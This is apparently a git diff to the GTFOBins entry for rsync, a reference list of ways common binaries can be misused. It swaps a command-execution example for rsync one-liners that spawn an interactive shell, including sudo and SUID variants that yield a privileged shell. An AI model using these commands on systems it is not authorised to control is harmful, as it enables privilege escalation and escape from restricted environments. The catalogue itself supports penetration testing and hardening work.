diff --git a/_gtfobins/rsync.md b/_gtfobins/rsync.md index 79ff9e4..754d848 100644 --- a/_gtfobins/rsync.md +++ b/_gtfobins/rsync.md @@ -1,9 +1,9 @@ --- functions: - execute-non-interactive: - - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile - rsync -e 'sh /tmp/tmpfile' /dev/null 127.0.0.1:/dev/null 2>/dev/null + execute-interactive: + - code: rsync -e 'bash -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null sudo-enabled: - - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile - sudo rsync -e 'sh /tmp/tmpfile' /dev/null 127.0.0.1:/dev/null 2>/dev/null + - code: sudo rsync -e 'bash -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null + suid-enabled: + - code: ./rsync -e 'bash -p -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null ---